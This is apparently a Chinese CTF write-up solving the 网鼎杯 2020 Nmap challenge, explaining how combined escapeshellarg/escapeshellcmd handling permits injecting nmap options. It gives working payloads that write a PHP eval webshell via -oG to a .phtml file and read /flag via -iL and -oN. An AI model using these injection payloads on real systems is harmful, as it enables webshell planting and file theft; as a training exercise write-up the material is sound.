[网鼎杯 2020 朱雀组]Nmap

启动环境

结合题目首先就是要知道关于关于nmap命令

复制代码
相关的命令-oN 标准保存

-oX XML保存

-oG Grep保存

-oA 保存到所有格式

-iL 读取文件内容,以文件内容作为搜索目标

-o 输出到文件

-sP Ping 扫描

还有许多

nmap命令https://blog.csdn.net/weixin_73562787/article/details/131793001这个页面就是类似于nmap命令,所以就先做一波尝试

先看看127.0.0.1

后面可以结合一下命令执行,用 | 作为分隔符

127.0.0.1 | ls

发现与刚刚的页面不一样,说明是可以进行命令执行的,但是|被\转义了,尝试;

127.0.0.1 ; ls

后面就没有什么思路了

其他师傅提示说nmap注入

有两个方式

1.利用-oG,可以将命令和结果写进文件。

2.利用-iL 和-oN。其中-iL是从inputfilename文件中读取扫描的目标。在这个文件中要有一个主机或者网络的列表,由空格键、制表键或者回车键作为分割符。如果使用-iL-,nmap就会从标准输入stdin读取主机名字。你可以从指定目标一节得到更加详细的信息,-oN是把扫描结果重定向到一个可读的文件logfilename中

介绍两个函数

escapeshellarg和escapeshellcmd函数

escapshellarg()

这个的操作比较多

对类似非法的 进行 加引号和转义符

escapshellcmd()

这个是对非法进行加转义符

eg

172.17.0.2' -v -d a=1

经过escapeshellarg处理后变成了'172.17.0.2''' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。

经过escapeshellcmd处理后变成'172.17.0.2'\'' -v -d a=1',这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义

-oG

payload

复制代码
127.0.0.1' <?php @eval($_POST["hack"]);?> -oG test.php '

好像不行,应该是被过滤一些东西

应该是过滤了php标签

然后需要用 短标签去绕过,将标签改为.phtml

复制代码
127.0.0.1' <?= @eval($_POST["hack"]);?> -oG test.phtml '

后面再蚁剑连接

-iL

payload

复制代码
' -iL /flag -oN 1.txt '

然后访问1.txt就可以了

相关推荐
aodunsoft9 分钟前
安全月报 | 傲盾DDoS攻击防御2025年9月简报
网络·安全·ddos
杂化轨道VSEPR19 分钟前
基站计数器与KPI:移动通信网络性能评估的核心引擎
运维·服务器·网络·5g·信息与通信
小张数码20 分钟前
随身WiFi技术深探:通信芯片/信号增益原理解析+开源方案参考!随身WiFi建议买吗?随身WiFi品牌哪个网速快信号稳定?格行随身WiFi怎么样?
网络·物联网
派大星爱吃鱼1 小时前
图解网络(科普版)
网络
饥饿的半导体2 小时前
网络协议工程 - eNSP及相关软件安装 - [eNSP, VirtualBox, WinPcap, Wireshark, Win7]
网络·网络协议·wireshark
大锦终2 小时前
【Linux】udp网络程序
linux·运维·服务器·网络
white-persist3 小时前
JWT 漏洞全解析:从原理到实战
前端·网络·python·安全·web安全·网络安全·系统安全
数据与人工智能律师3 小时前
解码Web3:DeFi、GameFi、SocialFi的法律风险警示与合规路径
大数据·网络·人工智能·云计算·区块链
xingxing_F3 小时前
Network Radar for Mac 网络扫描管理软件
网络·macos
wanhengidc3 小时前
巨椰云手机引领未来
运维·服务器·网络·游戏·智能手机